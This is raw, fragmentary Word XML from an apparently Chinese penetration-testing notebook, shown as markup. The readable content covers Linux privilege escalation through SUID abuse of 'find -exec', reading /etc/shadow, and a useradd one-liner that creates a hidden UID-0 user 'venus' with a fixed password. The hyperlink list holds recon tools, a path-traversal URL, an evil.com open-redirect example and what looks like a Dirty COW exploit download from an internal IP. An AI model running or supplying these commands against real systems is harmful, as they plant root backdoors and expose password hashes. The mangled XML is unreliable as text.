      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F"/>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sui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提权</w:t>
      </w:r>
      <w:r w:rsidR="00851549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="0039199F">
      <w:r w:rsidRPr="0094298A">
        <w:t>https://www.freebuf.com/articles/system/149118.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199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851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先find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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+所要运行的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二：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51549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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'/bin/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' \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三：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先touch XXX创建一个文件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然后：find / -type f -name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w: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"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whoami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" \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F"/>
    <w:p w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd         #查看用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow         #查看用户的密码信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/group          #查看用户的组信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9"/>
    <w:p w:rsidR="00191C2D" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54C43">
        <w:t>利用 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54C43">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54C43">
        <w:t>/passwd 文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54C43" w:rsidRDefault="00972178" w:rsidP="000121D9">
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidR="00B54C43" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/qq_36119192/article/details/99871667</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B54C43" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="000121D9"/>
    <w:p w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:r>
        <w:t>以下这条命令直接生成一个具有root权限的用户：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>venus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，密码为：123qwe 。前提是这条命令的执行需要root权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve"> -p `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve"> passwd -1 -salt 'user' 123qwe` -u 0 -o -g </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>root  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve">G root -s /bin/bash -d /home/user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>venus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows提权：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机版本基本信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w:rsidR="00F76936" w:rsidRPr="00851549" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:sectPr w:rsidR="00F76936" w:rsidRPr="008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06" w:rsidRDefault="00C62106" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C62106" w:rsidRDefault="00C62106" w:rsidP="003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06" w:rsidRDefault="00C62106" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C62106" w:rsidRDefault="00C62106" w:rsidP="0038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E8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F9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6EAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE0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4E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="628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E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="392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26638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FF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05B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BC00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67BF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A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371B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="458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55449"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E65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56226"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2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63D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1049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345AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE1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70240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E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320B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="820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A3D76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="533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32089"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA1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D48BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD8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E760D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="536A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C360D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A5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F2627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="658C3F92"/>
    <w:lvl w:ilvl="0" w:tplc="526C8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93637C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D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74EFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF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F0B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED8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9401B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC6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83F50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28F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45BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB8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53BC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D07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82EF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84DA1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228AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E2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000B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="435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9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="22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23"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="0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3A"/>
    <w:rsid w:val="000121D9"/>
    <w:rsid w:val="00056C4E"/>
    <w:rsid w:val="000764FB"/>
    <w:rsid w:val="000824C0"/>
    <w:rsid w:val="00091445"/>
    <w:rsid w:val="000A449A"/>
    <w:rsid w:val="000C1FDE"/>
    <w:rsid w:val="000C3152"/>
    <w:rsid w:val="000D5101"/>
    <w:rsid w:val="001011AF"/>
    <w:rsid w:val="00103D75"/>
    <w:rsid w:val="00126765"/>
    <w:rsid w:val="00162B31"/>
    <w:rsid w:val="001646FC"/>
    <w:rsid w:val="00164719"/>
    <w:rsid w:val="00164D08"/>
    <w:rsid w:val="001815CA"/>
    <w:rsid w:val="00191C2D"/>
    <w:rsid w:val="001C373D"/>
    <w:rsid w:val="001D58EC"/>
    <w:rsid w:val="002110F6"/>
    <w:rsid w:val="002A3401"/>
    <w:rsid w:val="002B554F"/>
    <w:rsid w:val="002D5237"/>
    <w:rsid w:val="002D6C60"/>
    <w:rsid w:val="0034210A"/>
    <w:rsid w:val="003439C6"/>
    <w:rsid w:val="0035107E"/>
    <w:rsid w:val="003630CF"/>
    <w:rsid w:val="00367951"/>
    <w:rsid w:val="003719B2"/>
    <w:rsid w:val="0038154F"/>
    <w:rsid w:val="003853C3"/>
    <w:rsid w:val="0039199F"/>
    <w:rsid w:val="003C3D8B"/>
    <w:rsid w:val="0045396C"/>
    <w:rsid w:val="00456CC1"/>
    <w:rsid w:val="0048048C"/>
    <w:rsid w:val="004A36CF"/>
    <w:rsid w:val="004F1A15"/>
    <w:rsid w:val="00511EEF"/>
    <w:rsid w:val="0052486C"/>
    <w:rsid w:val="00531A8E"/>
    <w:rsid w:val="005474CB"/>
    <w:rsid w:val="00562437"/>
    <w:rsid w:val="00582F10"/>
    <w:rsid w:val="005A3EC1"/>
    <w:rsid w:val="005C3B9B"/>
    <w:rsid w:val="005C4DB7"/>
    <w:rsid w:val="00622ABA"/>
    <w:rsid w:val="00664EC7"/>
    <w:rsid w:val="006738C8"/>
    <w:rsid w:val="006B3FE4"/>
    <w:rsid w:val="006D676B"/>
    <w:rsid w:val="006E5E33"/>
    <w:rsid w:val="006F7A6B"/>
    <w:rsid w:val="00702405"/>
    <w:rsid w:val="00735F30"/>
    <w:rsid w:val="00744980"/>
    <w:rsid w:val="00773E0B"/>
    <w:rsid w:val="0078275F"/>
    <w:rsid w:val="00797674"/>
    <w:rsid w:val="007A3227"/>
    <w:rsid w:val="007B700F"/>
    <w:rsid w:val="007F5999"/>
    <w:rsid w:val="007F7103"/>
    <w:rsid w:val="008027AB"/>
    <w:rsid w:val="0082359F"/>
    <w:rsid w:val="00830512"/>
    <w:rsid w:val="00850C93"/>
    <w:rsid w:val="00851549"/>
    <w:rsid w:val="00864742"/>
    <w:rsid w:val="008756F8"/>
    <w:rsid w:val="00877529"/>
    <w:rsid w:val="008C6A82"/>
    <w:rsid w:val="008D2A0E"/>
    <w:rsid w:val="008E7CBA"/>
    <w:rsid w:val="008F3489"/>
    <w:rsid w:val="00907A06"/>
    <w:rsid w:val="00921670"/>
    <w:rsid w:val="009415C3"/>
    <w:rsid w:val="0094298A"/>
    <w:rsid w:val="00951B28"/>
    <w:rsid w:val="009534B4"/>
    <w:rsid w:val="00972178"/>
    <w:rsid w:val="00982F28"/>
    <w:rsid w:val="0098533C"/>
    <w:rsid w:val="009B1D8E"/>
    <w:rsid w:val="009B36FD"/>
    <w:rsid w:val="00A14128"/>
    <w:rsid w:val="00A42238"/>
    <w:rsid w:val="00A448A4"/>
    <w:rsid w:val="00A538A2"/>
    <w:rsid w:val="00A930EC"/>
    <w:rsid w:val="00AD1608"/>
    <w:rsid w:val="00AD3AAE"/>
    <w:rsid w:val="00B356D4"/>
    <w:rsid w:val="00B3698D"/>
    <w:rsid w:val="00B403D9"/>
    <w:rsid w:val="00B5008B"/>
    <w:rsid w:val="00B54C43"/>
    <w:rsid w:val="00B74DED"/>
    <w:rsid w:val="00BB29BE"/>
    <w:rsid w:val="00BC3FCD"/>
    <w:rsid w:val="00C03BAD"/>
    <w:rsid w:val="00C406D8"/>
    <w:rsid w:val="00C62106"/>
    <w:rsid w:val="00C75246"/>
    <w:rsid w:val="00C804F3"/>
    <w:rsid w:val="00CA2DA4"/>
    <w:rsid w:val="00CA4616"/>
    <w:rsid w:val="00CA7E51"/>
    <w:rsid w:val="00CB3A3A"/>
    <w:rsid w:val="00CD3AF6"/>
    <w:rsid w:val="00CE5F8F"/>
    <w:rsid w:val="00D11994"/>
    <w:rsid w:val="00D52FDC"/>
    <w:rsid w:val="00D7298B"/>
    <w:rsid w:val="00D75791"/>
    <w:rsid w:val="00E0097B"/>
    <w:rsid w:val="00E422F6"/>
    <w:rsid w:val="00E605F2"/>
    <w:rsid w:val="00EA5F02"/>
    <w:rsid w:val="00F33CED"/>
    <w:rsid w:val="00F450A0"/>
    <w:rsid w:val="00F76936"/>
    <w:rsid w:val="00F823C0"/>
    <w:rsid w:val="00F91404"/>
    <w:rsid w:val="00F922B5"/>
    <w:rsid w:val="00FA7087"/>
    <w:rsid w:val="00FB531E"/>
    <w:rsid w:val="00FB6A41"/>
    <w:rsid w:val="00FC269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565B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB7039E7-DBF4-4422-847B-075F7136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6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B3A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6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B3A3A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C80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804F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804F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7298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72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07A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15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154F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CA2DA4"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A4223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B3FE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B36FD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009B36FD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000A449A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="l0">
    <w:name w:val="l0"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00BB2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B29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002D6C60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00851549"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1loh5">
    <w:name w:val="_1loh_5"/>
    <w:basedOn w:val="a0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pcc.com/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lingfengyun.com/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yunsee.cn/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/zhaijiahui/p/8459661.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=95&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="/nb/15176424" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.beianbeian.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aizhan.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webiplookup.com/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GerbenJavado/LinkFinder" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.99/dirty.c%20-O%20/tmp/dirty.c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6.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untrust.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wepcc.com/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whatweb.bugscaner.com/look" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/6594" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.&#20027;&#26426;&#21517;" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1.1.1.1/../../../../dir/file.txt" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aizhan.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.beianbeian.com/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_36119192/article/details/99871667" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GerbenJavado/LinkFinder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7.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.51cto.com/wt7315/1863177" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/219/" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/20179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qichacha.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asm.ca.com/en/ping.php" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whatweb.bugscaner.com/look" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whois.chinaz.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webiplookup.com/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shuimugan.com/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Threezh1/JSFinder" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anquanke.com/post/id/93878" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/188464.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/huanghelouzi/article/details/82995313" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 